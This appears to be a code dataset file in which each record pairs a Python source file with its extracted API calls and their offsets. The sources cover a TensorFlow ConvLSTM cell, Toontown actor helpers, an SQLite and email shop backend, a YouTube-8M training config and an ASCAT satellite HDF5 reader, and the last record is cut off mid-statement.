# i = input_gate, j = new_input, f = forget_gate, o = output_gate
i, j, f, o = tf.split(axis=3, num_or_size_splits=4, value=concat)
new_c = (c * tf.nn.sigmoid(f + self._forget_bias) + tf.nn.sigmoid(i) *
self._activation(j))
new_h = self._activation(new_c) * tf.nn.sigmoid(o)
if self._state_is_tuple:
new_state = LSTMStateTuple(new_c, new_h)
else:
new_state = tf.concat(axis=3, values=[new_c, new_h])
return new_h, new_state
def _conv_linear(args, filter_size, num_features, bias,
bias_start=0.0, scope=None, reuse=False):
"""convolution:
Args:
args: a 4D Tensor or a list of 4D, batch x n, Tensors.
filter_size: int tuple of filter height and width.
num_features: int, number of features.
bias_start: starting value to initialize the bias; 0 by default.
scope: VariableScope for the created subgraph; defaults to "Linear".
reuse: For reusing already existing weights
Returns:
A 4D Tensor with shape [batch h w num_features]
Raises:
ValueError: if some of the arguments has unspecified or wrong shape.
"""
# Calculate the total size of arguments on dimension 1.
total_arg_size_depth = 0
shapes = [a.get_shape().as_list() for a in args]
for shape in shapes:
if len(shape) != 4:
raise ValueError("Linear is expecting 4D arguments: %s" % str(shapes))
if not shape[3]:
raise ValueError("Linear expects shape[4] of arguments: %s" % str(shapes))
else:
total_arg_size_depth += shape[3]
dtype = [a.dtype for a in args][0]
# Now the computation.
with tf.variable_scope(scope or "Conv", reuse=reuse):
matrix = tf.get_variable(
"Matrix", [filter_size[0], filter_size[1],
total_arg_size_depth, num_features], dtype=dtype)
if len(args) == 1:
res = tf.nn.conv2d(args[0], matrix, strides=[1, 1, 1, 1], padding='SAME')
else:
res = tf.nn.conv2d(tf.concat(axis=3, values=args), matrix,
strides=[1, 1, 1, 1], padding='SAME')
if not bias:
return res
bias_term = tf.get_variable(
"Bias", [num_features],
dtype=dtype, initializer=tf.constant_initializer(bias_start,
dtype=dtype)
)
return res + bias_term
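# Hedged usage sketch (TF1-style graph code; the shapes below are illustrative):
#   cell = BasicConvLSTMCell(shape=[16, 16], filter_size=[3, 3], num_features=32)
#   x = tf.placeholder(tf.float32, [1, 16, 16, 8])
#   # with state_is_tuple=False the (c, h) state is packed along the channel axis
#   state = tf.zeros([1, 16, 16, 2 * 32])
#   y, state = cell(x, state)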
|
[
"tensorflow.constant_initializer",
"tensorflow.variable_scope",
"tensorflow.concat",
"tensorflow.nn.sigmoid",
"tensorflow.nn.conv2d",
"tensorflow.split",
"tensorflow.get_variable"
] |
[((3677, 3724), 'tensorflow.variable_scope', 'tf.variable_scope', (["(scope or 'Conv')"], {'reuse': 'reuse'}), "(scope or 'Conv', reuse=reuse)\n", (3694, 3724), True, 'import tensorflow as tf\n'), ((3739, 3851), 'tensorflow.get_variable', 'tf.get_variable', (['"""Matrix"""', '[filter_size[0], filter_size[1], total_arg_size_depth, num_features]'], {'dtype': 'dtype'}), "('Matrix', [filter_size[0], filter_size[1],\n total_arg_size_depth, num_features], dtype=dtype)\n", (3754, 3851), True, 'import tensorflow as tf\n'), ((2145, 2197), 'tensorflow.split', 'tf.split', ([], {'axis': '(3)', 'num_or_size_splits': '(4)', 'value': 'concat'}), '(axis=3, num_or_size_splits=4, value=concat)\n', (2153, 2197), True, 'import tensorflow as tf\n'), ((3911, 3978), 'tensorflow.nn.conv2d', 'tf.nn.conv2d', (['args[0]', 'matrix'], {'strides': '[1, 1, 1, 1]', 'padding': '"""SAME"""'}), "(args[0], matrix, strides=[1, 1, 1, 1], padding='SAME')\n", (3923, 3978), True, 'import tensorflow as tf\n'), ((1886, 1937), 'tensorflow.split', 'tf.split', ([], {'axis': '(3)', 'num_or_size_splits': '(2)', 'value': 'state'}), '(axis=3, num_or_size_splits=2, value=state)\n', (1894, 1937), True, 'import tensorflow as tf\n'), ((2352, 2368), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['o'], {}), '(o)\n', (2365, 2368), True, 'import tensorflow as tf\n'), ((2482, 2522), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': '[new_c, new_h]'}), '(axis=3, values=[new_c, new_h])\n', (2491, 2522), True, 'import tensorflow as tf\n'), ((4014, 4044), 'tensorflow.concat', 'tf.concat', ([], {'axis': '(3)', 'values': 'args'}), '(axis=3, values=args)\n', (4023, 4044), True, 'import tensorflow as tf\n'), ((4249, 4297), 'tensorflow.constant_initializer', 'tf.constant_initializer', (['bias_start'], {'dtype': 'dtype'}), '(bias_start, dtype=dtype)\n', (4272, 4297), True, 'import tensorflow as tf\n'), ((2218, 2254), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['(f + self._forget_bias)'], {}), '(f + self._forget_bias)\n', (2231, 2254), True, 'import tensorflow as tf\n'), ((2257, 2273), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', (['i'], {}), '(i)\n', (2270, 2273), True, 'import tensorflow as tf\n')]
|
from panda3d.core import CollisionTube, CollisionNode
from libotp.nametag.NametagGroup import *
from toontown.pets import Pet
from toontown.suit import SuitDNA, Suit
from toontown.toon import NPCToons, Toon, ToonDNA
from toontown.toonbase import TTLocalizer
from toontown.toonbase import ToontownGlobals
def createToon(toonId, x=0, y=0, z=0, h=0, p=0, r=0, parent=render, anim='neutral', LOD=1000, isDisguised=False, suitType='f', coll=True):
newToon = NPCToons.createLocalNPC(toonId)
if not newToon:
newToon = NPCToons.createLocalNPC(1)
newToon.head = newToon.find('**/__Actor_head')
if isDisguised:
newToon.putOnSuit(suitType, False, False)
if coll:
collTube = CollisionTube(0, 0, 0.5, 0, 0, 4, 2)
collNode = CollisionNode('suit')
collNode.addSolid(collTube)
newToon.attachNewNode(collNode)
else:
newToon.useLOD(LOD)
if coll:
newToon.initializeBodyCollisions('toon')
newToon.setPosHpr(x, y, z, h, p, r)
newToon.reparentTo(parent)
newToon.loop(anim)
return newToon
def createUniqueToon(name, dna, hat, glasses, backpack, shoes, x=0, y=0, z=0, h=0, p=0, r=0, parent=render, anim='neutral', LOD=1000, isDisguised=False, suitType='f', suitDept='c', isWaiter=False, isRental=False, coll=True, colorType=NametagGroup.CCNonPlayer, cogLevels=(0, 0, 0, 0, 0), cheesyEffect=ToontownGlobals.CENormal, nametagStyle=100):
newToon = Toon.Toon()
newToon.setName(name)
newToon.setPickable(0)
newToon.setPlayerType(colorType)
if nametagStyle == 100:
font = loader.loadFont(TTLocalizer.InterfaceFont)
else:
font = loader.loadFont(TTLocalizer.NametagFonts[nametagStyle])
newToon.nametag.setFont(font)
newDNA = ToonDNA.ToonDNA()
newDNA.newToonFromProperties(*dna)
newToon.setDNAString(newDNA.makeNetString())
newToon.applyCheesyEffect(cheesyEffect, 0)
newToon.head = newToon.find('**/__Actor_head')
newToon.setHat(*hat)
newToon.setBackpack(*backpack)
newToon.setGlasses(*glasses)
newToon.setShoes(*shoes)
if isDisguised:
if isWaiter:
cogType = 4
else:
cogType = 0
newToon.cogLevels = []
for l in cogLevels:
newToon.cogLevels.append(l)
if cogType in ToontownGlobals.PutOnSuitRental or isRental:
index = ToontownGlobals.CogDepts.index(suitDept)
newToon.putOnSuit(index, cogType=cogType, rental=True)
else:
newToon.putOnSuit(suitType, cogType=cogType, rental=isRental)
if coll:
collTube = CollisionTube(0, 0, 0.5, 0, 0, 4, 2)
collNode = CollisionNode('suit')
collNode.addSolid(collTube)
newToon.attachNewNode(collNode)
else:
newToon.useLOD(LOD)
if coll:
newToon.initializeBodyCollisions('toon')
newToon.setPosHpr(x, y, z, h, p, r)
newToon.reparentTo(parent)
newToon.loop(anim)
return newToon
def createCog(cogType, x=0, y=0, z=0, h=0, p=0, r=0, isSkelecog=False, isWaiter=False, isVirtual=False, isSkeleRevive=False, colorType=NametagGroup.CCSuit, anim='neutral', parent=render, name=None, dept=None, level=None, coll=True):
newCog = Suit.Suit()
newCog.dna = SuitDNA.SuitDNA()
newCog.dna.newSuit(cogType)
newCog.setDNA(newCog.dna)
newCog.setPlayerType(colorType)
newCog.setPickable(0)
level = level if level != None else newCog.getActualLevel()
if isWaiter:
newCog.makeWaiter()
if isSkelecog:
newCog.makeSkeleton()
newCog.setName(TTLocalizer.Skeleton)
if isVirtual:
newCog.makeVirtual()
if isSkeleRevive:
level = '%s%s' % (level, TTLocalizer.SkeleRevivePostFix)
if name != None:
newCog.setName(name)
if dept is False:
nameInfo = TTLocalizer.SuitBaseNameWithoutDept % {'name': newCog._name, 'level': level}
else:
nameInfo = TTLocalizer.SuitBaseNameWithLevel % {'name': newCog._name, 'dept': dept if dept != None else newCog.getStyleDept(),
'level': level}
newCog.setPosHpr(x, y, z, h, p, r)
newCog.reparentTo(parent)
newCog.loop(anim)
newCog.setDisplayName(nameInfo)
if coll:
collTube = CollisionTube(0, 0, 0.5, 0, 0, 4, 2)
collNode = CollisionNode('suit')
collNode.addSolid(collTube)
newCog.attachNewNode(collNode)
return newCog
def createDoodle(name, head, ears, nose, tail, body, color, colorScale, eyes, gender, x=0, y=0, z=0, h=0, p=0, r=0, parent=render, coll=True):
doodle = Pet.Pet()
doodle.setDNA([head, ears, nose, tail, body, color, colorScale, eyes, gender])
doodle.setName(name)
doodle.setPickable(0)
doodle.reparentTo(parent)
doodle.setPosHpr(x, y, z, h, p, r)
doodle.enterNeutralHappy()
if coll:
doodle.initializeBodyCollisions('pet')
return doodle
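# Hedged usage sketch (IDs, positions and suit codes are illustrative; these
# helpers rely on the client globals `render` and `loader` being available):
#   npc = createToon(2001, x=10, y=5, h=180)
#   cog = createCog('f', x=0, y=20, level=3, dept='c')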
|
[
"toontown.toon.ToonDNA.ToonDNA",
"panda3d.core.CollisionNode",
"toontown.suit.Suit.Suit",
"toontown.suit.SuitDNA.SuitDNA",
"panda3d.core.CollisionTube",
"toontown.toonbase.ToontownGlobals.CogDepts.index",
"toontown.toon.NPCToons.createLocalNPC",
"toontown.pets.Pet.Pet",
"toontown.toon.Toon.Toon"
] |
[((458, 489), 'toontown.toon.NPCToons.createLocalNPC', 'NPCToons.createLocalNPC', (['toonId'], {}), '(toonId)\n', (481, 489), False, 'from toontown.toon import NPCToons, Toon, ToonDNA\n'), ((1464, 1475), 'toontown.toon.Toon.Toon', 'Toon.Toon', ([], {}), '()\n', (1473, 1475), False, 'from toontown.toon import NPCToons, Toon, ToonDNA\n'), ((1780, 1797), 'toontown.toon.ToonDNA.ToonDNA', 'ToonDNA.ToonDNA', ([], {}), '()\n', (1795, 1797), False, 'from toontown.toon import NPCToons, Toon, ToonDNA\n'), ((3267, 3278), 'toontown.suit.Suit.Suit', 'Suit.Suit', ([], {}), '()\n', (3276, 3278), False, 'from toontown.suit import SuitDNA, Suit\n'), ((3296, 3313), 'toontown.suit.SuitDNA.SuitDNA', 'SuitDNA.SuitDNA', ([], {}), '()\n', (3311, 3313), False, 'from toontown.suit import SuitDNA, Suit\n'), ((4604, 4613), 'toontown.pets.Pet.Pet', 'Pet.Pet', ([], {}), '()\n', (4611, 4613), False, 'from toontown.pets import Pet\n'), ((528, 554), 'toontown.toon.NPCToons.createLocalNPC', 'NPCToons.createLocalNPC', (['(1)'], {}), '(1)\n', (551, 554), False, 'from toontown.toon import NPCToons, Toon, ToonDNA\n'), ((4275, 4311), 'panda3d.core.CollisionTube', 'CollisionTube', (['(0)', '(0)', '(0.5)', '(0)', '(0)', '(4)', '(2)'], {}), '(0, 0, 0.5, 0, 0, 4, 2)\n', (4288, 4311), False, 'from panda3d.core import CollisionTube, CollisionNode\n'), ((4331, 4352), 'panda3d.core.CollisionNode', 'CollisionNode', (['"""suit"""'], {}), "('suit')\n", (4344, 4352), False, 'from panda3d.core import CollisionTube, CollisionNode\n'), ((716, 752), 'panda3d.core.CollisionTube', 'CollisionTube', (['(0)', '(0)', '(0.5)', '(0)', '(0)', '(4)', '(2)'], {}), '(0, 0, 0.5, 0, 0, 4, 2)\n', (729, 752), False, 'from panda3d.core import CollisionTube, CollisionNode\n'), ((776, 797), 'panda3d.core.CollisionNode', 'CollisionNode', (['"""suit"""'], {}), "('suit')\n", (789, 797), False, 'from panda3d.core import CollisionTube, CollisionNode\n'), ((2396, 2436), 'toontown.toonbase.ToontownGlobals.CogDepts.index', 'ToontownGlobals.CogDepts.index', (['suitDept'], {}), '(suitDept)\n', (2426, 2436), False, 'from toontown.toonbase import ToontownGlobals\n'), ((2632, 2668), 'panda3d.core.CollisionTube', 'CollisionTube', (['(0)', '(0)', '(0.5)', '(0)', '(0)', '(4)', '(2)'], {}), '(0, 0, 0.5, 0, 0, 4, 2)\n', (2645, 2668), False, 'from panda3d.core import CollisionTube, CollisionNode\n'), ((2692, 2713), 'panda3d.core.CollisionNode', 'CollisionNode', (['"""suit"""'], {}), "('suit')\n", (2705, 2713), False, 'from panda3d.core import CollisionTube, CollisionNode\n')]
|
from backend_web import sql, pd
def query_sql(PATH_SQL: str, Query: str, fetch: bool):
with sql.connect(PATH_SQL) as conn:
cur = conn.cursor()
cur.execute(Query)
if fetch:
return cur.fetchone()
conn.commit()
return 0
def sql_tables(PATH_SQL: str, Query: str):
with sql.connect(PATH_SQL) as conn:
cur = conn.cursor()
cur.execute(Query)
col = next(zip(*cur.description))
df = pd.DataFrame.from_records(cur.fetchall(), columns=col)
conn.commit()
return df
def initialize_products(PATH_SQL: str):
with sql.connect(PATH_SQL) as conn:
cur = conn.cursor()
cur.execute("""
CREATE TABLE IF NOT EXISTS PRODUCTS(
ID_PRODUCT INTEGER PRIMARY KEY,
NAME TEXT,
DESCRIPTION TEXT,
ID_STALL INTEGER,
PRICE REAL
);
""")
conn.commit()
return 0
def initialize_customers(PATH_SQL: str):
with sql.connect(PATH_SQL) as conn:
cur = conn.cursor()
cur.execute("""
CREATE TABLE IF NOT EXISTS CUSTOMERS(
ID_CUSTOMERS INTEGER PRIMARY KEY,
NAME TEXT,
PASSWORD TEXT,
EMAIL TEXT,
PHONE TEXT,
CREDIT_CARD TEXT
);
""")
conn.commit()
return 0
def initialize_stall(PATH_SQL: str):
with sql.connect(PATH_SQL) as conn:
cur = conn.cursor()
cur.execute("""
CREATE TABLE IF NOT EXISTS STALL(
ID_STALL INTEGER PRIMARY KEY,
NAME TEXT,
PASSWORD TEXT,
ACCOUNT TEXT,
PHONE TEXT
);
""")
return 0
def initalize_order(PATH_SQL: str):
with sql.connect(PATH_SQL) as conn:
cur = conn.cursor()
cur.execute("""
CREATE TABLE IF NOT EXISTS ORDERS(
ID_ORDER INTEGER PRIMARY KEY,
ID_PRODUCT INTEGER,
STATUS TEXT,
SPECIAL_REQUESTS TEXT,
PHONE_NO TEXT,
ID_CUSTOMER INTEGER
);
""")
return 0
def initialize_track(PATH_SQL: str):
with sql.connect(PATH_SQL) as conn:
cur = conn.cursor()
cur.execute("""
CREATE TABLE IF NOT EXISTS TRACK(
ID_BOX INTEGER PRIMARY KEY,
ID_ORDER INTEGER NULL,
ID_STALL INTEGER NULL,
STATUS TEXT
);
""")
return 0
def r_attr(self): # RETURNS THE VALUES OF AN INSTANCE VARIABLES
lst = [types(i) for i, types in zip(self.__dict__.values(), self.__annotations__.values())]
return (*lst,)
def r_col(self): # RETURNS THE PROPERTIES OF A CLASS OR INSTANCE
if type(self) == type(type): # CHECK IF ITS AN CLASS OR INSTANCE OF A CLASS
tup = range(self.__init__.__code__.co_argcount - 1)
self = self(*tup)
return (*self.__dict__,)
def notify_new(email: str):
import os
import smtplib
import imghdr
from email.message import EmailMessage
from backend_web import load_dotenv
load_dotenv(os.path.join(os.getcwd(),".env"))
EMAIL_ADDRESS = os.environ.get("EMAIL_ADDRESS")
EMAIL_KEY = os.environ.get("EMAIL_KEY")
msg = EmailMessage()
msg["Subject"] = "Thank you for registering"
msg["From"] = EMAIL_ADDRESS
msg["To"] = email
msg.set_content("Thank you for registering with our website... Happy Ordering!")
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:
smtp.login(EMAIL_ADDRESS, EMAIL_KEY)
smtp.send_message(msg)
def parse_items(txt: str):
DATA = txt.split("&")
cmd, cmd_data = DATA[0].split("=")
data = DATA[1:]
return cmd, cmd_data, data
def NULL_FIRST(lst: list):
a = f'{lst[1:]}'[1:-1]
b = f'(NULL, {a})'
return b
def json_to_dic(path: str):
import json
with open(path) as file:
return json.load(file)
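# Hedged usage sketch ("shop.db" is a placeholder SQLite file path):
#   initialize_products("shop.db")
#   query_sql("shop.db",
#             "INSERT INTO PRODUCTS VALUES (NULL, 'Tea', 'Loose leaf', 1, 2.5)",
#             fetch=False)
#   products = sql_tables("shop.db", "SELECT * FROM PRODUCTS")  # pandas DataFrame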
|
[
"smtplib.SMTP_SSL",
"json.load",
"os.getcwd",
"email.message.EmailMessage",
"os.environ.get",
"backend_web.sql.connect"
] |
[((3136, 3167), 'os.environ.get', 'os.environ.get', (['"""EMAIL_ADDRESS"""'], {}), "('EMAIL_ADDRESS')\n", (3150, 3167), False, 'import os\n'), ((3184, 3211), 'os.environ.get', 'os.environ.get', (['"""EMAIL_KEY"""'], {}), "('EMAIL_KEY')\n", (3198, 3211), False, 'import os\n'), ((3223, 3237), 'email.message.EmailMessage', 'EmailMessage', ([], {}), '()\n', (3235, 3237), False, 'from email.message import EmailMessage\n'), ((97, 118), 'backend_web.sql.connect', 'sql.connect', (['PATH_SQL'], {}), '(PATH_SQL)\n', (108, 118), False, 'from backend_web import sql, pd\n'), ((323, 344), 'backend_web.sql.connect', 'sql.connect', (['PATH_SQL'], {}), '(PATH_SQL)\n', (334, 344), False, 'from backend_web import sql, pd\n'), ((609, 630), 'backend_web.sql.connect', 'sql.connect', (['PATH_SQL'], {}), '(PATH_SQL)\n', (620, 630), False, 'from backend_web import sql, pd\n'), ((997, 1018), 'backend_web.sql.connect', 'sql.connect', (['PATH_SQL'], {}), '(PATH_SQL)\n', (1008, 1018), False, 'from backend_web import sql, pd\n'), ((1405, 1426), 'backend_web.sql.connect', 'sql.connect', (['PATH_SQL'], {}), '(PATH_SQL)\n', (1416, 1426), False, 'from backend_web import sql, pd\n'), ((1754, 1775), 'backend_web.sql.connect', 'sql.connect', (['PATH_SQL'], {}), '(PATH_SQL)\n', (1765, 1775), False, 'from backend_web import sql, pd\n'), ((2157, 2178), 'backend_web.sql.connect', 'sql.connect', (['PATH_SQL'], {}), '(PATH_SQL)\n', (2168, 2178), False, 'from backend_web import sql, pd\n'), ((3437, 3476), 'smtplib.SMTP_SSL', 'smtplib.SMTP_SSL', (['"""smtp.gmail.com"""', '(465)'], {}), "('smtp.gmail.com', 465)\n", (3453, 3476), False, 'import smtplib\n'), ((3886, 3901), 'json.load', 'json.load', (['file'], {}), '(file)\n', (3895, 3901), False, 'import json\n'), ((3090, 3101), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3099, 3101), False, 'import os\n')]
|
"""Video classification configuration definition."""
from typing import Optional, Tuple
import dataclasses
from official.core import config_definitions as cfg
from official.core import exp_factory
from official.modeling import hyperparams
from official.modeling import optimization
from official.vision.beta.configs import common
from absl import flags
FLAGS = flags.FLAGS
@dataclasses.dataclass
class DataConfig(cfg.DataConfig):
"""The base configuration for building datasets."""
name: Optional[str] = None
file_type: Optional[str] = 'tfrecord'
split: str = 'train'
  feature_sizes: Optional[Tuple[int, ...]] = None
  feature_names: Optional[Tuple[str, ...]] = None
segment_size: int = 1
segment_labels: bool = False
temporal_stride: int = 1
max_frames: int = -1
num_classes: int = -1
num_channels: int = 3
num_devices: int = 1
dtype: str = 'float32'
input_path: str = ''
is_training: bool = True
def yt8m(is_training):
"""YT8M dataset configs."""
return DataConfig(
name='yt8m',
num_classes=3862,
feature_sizes=[1024, 128],
feature_names=["rgb", "audio"],
max_frames=300,
segment_labels=False,
segment_size=5,
is_training=is_training,
split='train' if is_training else 'valid',
)
YT8M_TRAIN_EXAMPLES = 4880000 #TODO: get actual numbers
YT8M_VAL_EXAMPLES = 1220000
@dataclasses.dataclass
class YT8MModel(hyperparams.Config):
"""The model config."""
iterations : int = 30
cluster_size : int = 8192
hidden_size : int = 1024
add_batch_norm : bool = True
sample_random_frames : bool = True
is_training : bool = True
activation : str = "sigmoid"
pooling_method : str = "max"
yt8m_agg_classifier_model : str = "MoeModel"
frame_features : bool = False
segment_labels : bool = False
start_new_model : bool = True
@dataclasses.dataclass
class Losses(hyperparams.Config):
name = 'binary_crossentropy'
from_logits: bool = False
label_smoothing: float = 0.0
@dataclasses.dataclass
class YT8MTask(cfg.TaskConfig):
"""The task config."""
model: YT8MModel = YT8MModel()
train_data: DataConfig = yt8m(is_training=True)
validation_data: DataConfig = yt8m(is_training=False)
losses: Losses = Losses()
num_readers: int = 8
top_k: int = 20
  top_n: Optional[int] = None
def add_trainer(experiment: cfg.ExperimentConfig,
train_batch_size: int,
eval_batch_size: int,
learning_rate: float = 0.01,
train_epochs: int = 44,
):
"""Add and config a trainer to the experiment config."""
if YT8M_TRAIN_EXAMPLES <= 0:
raise ValueError('Wrong train dataset size {!r}'.format(
experiment.task.train_data))
if YT8M_VAL_EXAMPLES <= 0:
raise ValueError('Wrong validation dataset size {!r}'.format(
experiment.task.validation_data))
experiment.task.train_data.global_batch_size = train_batch_size
experiment.task.validation_data.global_batch_size = eval_batch_size
steps_per_epoch = YT8M_TRAIN_EXAMPLES // train_batch_size
experiment.trainer = cfg.TrainerConfig(
steps_per_loop=steps_per_epoch,
summary_interval=steps_per_epoch,
checkpoint_interval=steps_per_epoch,
train_steps=train_epochs * steps_per_epoch,
validation_steps=YT8M_VAL_EXAMPLES //
eval_batch_size,
validation_interval=steps_per_epoch,
optimizer_config=optimization.OptimizationConfig({
'optimizer': {
'type': 'adam',
'adam': {
}
},
'learning_rate': {
'type': 'exponential',
'exponential': {
'initial_learning_rate': learning_rate,
'decay_rate': 0.95,
'decay_steps': 4000000,
}
},
}))
return experiment
@exp_factory.register_config_factory('yt8m_experiment')
def yt8m_experiment() -> cfg.ExperimentConfig:
"""Video classification general."""
exp_config = cfg.ExperimentConfig(
runtime=cfg.RuntimeConfig(mixed_precision_dtype='bfloat16'),
task=YT8MTask(),
trainer=cfg.TrainerConfig(),
restrictions=[
'task.train_data.is_training != None',
'task.validation_data.is_training != None',
'task.train_data.num_classes == task.validation_data.num_classes',
'task.train_data.feature_sizes != None',
'task.train_data.feature_names != None'
])
return add_trainer(exp_config, train_batch_size=1024, eval_batch_size=1024)
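# Hedged usage sketch: once registered, the experiment can be looked up by name
# through the factory (get_exp_config is assumed from the Model Garden API):
#   exp_config = exp_factory.get_exp_config('yt8m_experiment')
#   print(exp_config.trainer.train_steps)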
|
[
"official.modeling.optimization.OptimizationConfig",
"official.core.exp_factory.register_config_factory",
"official.core.config_definitions.TrainerConfig",
"official.core.config_definitions.RuntimeConfig"
] |
[((3701, 3755), 'official.core.exp_factory.register_config_factory', 'exp_factory.register_config_factory', (['"""yt8m_experiment"""'], {}), "('yt8m_experiment')\n", (3736, 3755), False, 'from official.core import exp_factory\n'), ((3341, 3573), 'official.modeling.optimization.OptimizationConfig', 'optimization.OptimizationConfig', (["{'optimizer': {'type': 'adam', 'adam': {}}, 'learning_rate': {'type':\n 'exponential', 'exponential': {'initial_learning_rate': learning_rate,\n 'decay_rate': 0.95, 'decay_steps': 4000000}}}"], {}), "({'optimizer': {'type': 'adam', 'adam': {}},\n 'learning_rate': {'type': 'exponential', 'exponential': {\n 'initial_learning_rate': learning_rate, 'decay_rate': 0.95,\n 'decay_steps': 4000000}}})\n", (3372, 3573), False, 'from official.modeling import optimization\n'), ((3890, 3941), 'official.core.config_definitions.RuntimeConfig', 'cfg.RuntimeConfig', ([], {'mixed_precision_dtype': '"""bfloat16"""'}), "(mixed_precision_dtype='bfloat16')\n", (3907, 3941), True, 'from official.core import config_definitions as cfg\n'), ((3976, 3995), 'official.core.config_definitions.TrainerConfig', 'cfg.TrainerConfig', ([], {}), '()\n', (3993, 3995), True, 'from official.core import config_definitions as cfg\n')]
|
# Copyright (c) 2021, TU Wien, Department of Geodesy and Geoinformation
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of TU Wien, Department of Geodesy and Geoinformation
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL TU WIEN DEPARTMENT OF GEODESY AND
# GEOINFORMATION BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Readers for ASCAT Level 1b in HDF5 format.
"""
from collections import OrderedDict
import h5py
import numpy as np
import xarray as xr
from ascat.read_native.eps_native import set_flags
class AscatL1bHdf5File:
"""
Read ASCAT Level 1b file in HDF5 format.
"""
def __init__(self, filename):
"""
Initialize AscatL1bHdf5File.
Parameters
----------
filename : str
Filename.
"""
self.filename = filename
def read(self, generic=False, to_xarray=False):
"""
Read ASCAT Level 1b data.
Parameters
----------
generic : bool, optional
'True' reading and converting into generic format or
'False' reading original field names (default: False).
to_xarray : bool, optional
'True' return data as xarray.Dataset
'False' return data as numpy.ndarray (default: False).
Returns
-------
ds : xarray.Dataset, numpy.ndarray
ASCAT Level 1b data.
"""
data = {}
metadata = {}
root = 'U-MARF/EPS/ASCA_SZF_1B/'
mdr_path = root + 'DATA/MDR_1B_FULL_ASCA_Level_1_ARRAY_000001'
mdr_descr_path = root + 'DATA/MDR_1B_FULL_ASCA_Level_1_DESCR'
metadata_path = root + 'METADATA'
with h5py.File(self.filename, mode='r') as fid:
mdr = fid[mdr_path]
mdr_descr = fid[mdr_descr_path]
mdr_metadata = fid[metadata_path]
var_names = list(mdr.dtype.names)
for var_name in var_names:
data[var_name.lower()] = mdr[var_name]
if var_name.encode() in mdr_descr['EntryName']:
pos = mdr_descr['EntryName'] == var_name.encode()
scale = mdr_descr['Scale Factor'][pos][0].decode()
if scale != 'n/a':
data[var_name.lower()] = (data[
var_name.lower()] / (10. ** float(scale))).astype(
np.float32)
fields = ['SPACECRAFT_ID', 'ORBIT_START',
'PROCESSOR_MAJOR_VERSION', 'PROCESSOR_MINOR_VERSION',
'FORMAT_MAJOR_VERSION', 'FORMAT_MINOR_VERSION']
for f in fields:
pos = np.core.defchararray.startswith(
mdr_metadata['MPHR/MPHR_TABLE']['EntryName'], f.encode())
var = mdr_metadata['MPHR/MPHR_TABLE']['EntryValue'][
pos][0].decode()
if f == 'SPACECRAFT_ID':
var = var[-1]
metadata[f.lower()] = int(var)
# modify longitudes [0, 360] to [-180, 180]
mask = data['longitude_full'] > 180
data['longitude_full'][mask] += -360.
data['time'] = np.datetime64('2000-01-01') + data[
'utc_localisation-days'].astype('timedelta64[D]') + data[
'utc_localisation-milliseconds'].astype('timedelta64[ms]')
# modify azimuth angles to [0, 360]
if 'azi_angle_full' in var_names:
mask = data['azi_angle_full'] < 0
data['azi_angle_full'][mask] += 360
rename_coords = {'longitude_full': ('lon', np.float32),
'latitude_full': ('lat', np.float32)}
for var_name, (new_name, new_dtype) in rename_coords.items():
data[new_name] = data.pop(var_name).astype(new_dtype)
if generic:
data = conv_hdf5l1b_generic(data, metadata)
# 1 Left Fore Antenna, 2 Left Mid Antenna 3 Left Aft Antenna
# 4 Right Fore Antenna, 5 Right Mid Antenna, 6 Right Aft Antenna
antennas = ['lf', 'lm', 'la', 'rf', 'rm', 'ra']
ds = OrderedDict()
for i, antenna in enumerate(antennas):
subset = data['beam_number'] == i+1
metadata['beam_number'] = i+1
metadata['beam_name'] = antenna
# convert dict to xarray.Dataset or numpy.ndarray
if to_xarray:
sub_data = {}
for var_name in data.keys():
if var_name == 'beam_number' and generic:
continue
if len(data[var_name].shape) == 1:
dim = ['obs']
elif len(data[var_name].shape) == 2:
dim = ['obs', 'echo']
sub_data[var_name] = (dim, data[var_name][subset])
coords = {}
coords_fields = ['lon', 'lat', 'time']
for cf in coords_fields:
coords[cf] = sub_data.pop(cf)
ds[antenna] = xr.Dataset(sub_data, coords=coords,
attrs=metadata)
else:
# collect dtype info
dtype = []
for var_name in data.keys():
if len(data[var_name][subset].shape) == 1:
dtype.append(
(var_name, data[var_name][subset].dtype.str))
elif len(data[var_name][subset].shape) > 1:
dtype.append((var_name, data[var_name][
subset].dtype.str, data[var_name][
subset].shape[1:]))
ds[antenna] = np.empty(
data['time'][subset].size, dtype=np.dtype(dtype))
for var_name in data.keys():
if var_name == 'beam_number' and generic:
continue
ds[antenna][var_name] = data[var_name][subset]
return ds
def close(self):
"""
Close file.
"""
pass
def conv_hdf5l1b_generic(data, metadata):
"""
Rename and convert data types of dataset.
Parameters
----------
data : dict of numpy.ndarray
Original dataset.
metadata : dict
Metadata.
Returns
-------
data : dict of numpy.ndarray
Converted dataset.
"""
# convert spacecraft_id to internal sat_id
sat_id = np.array([4, 3, 5])
metadata['sat_id'] = sat_id[metadata['spacecraft_id']-1]
# compute ascending/descending direction
data['as_des_pass'] = (
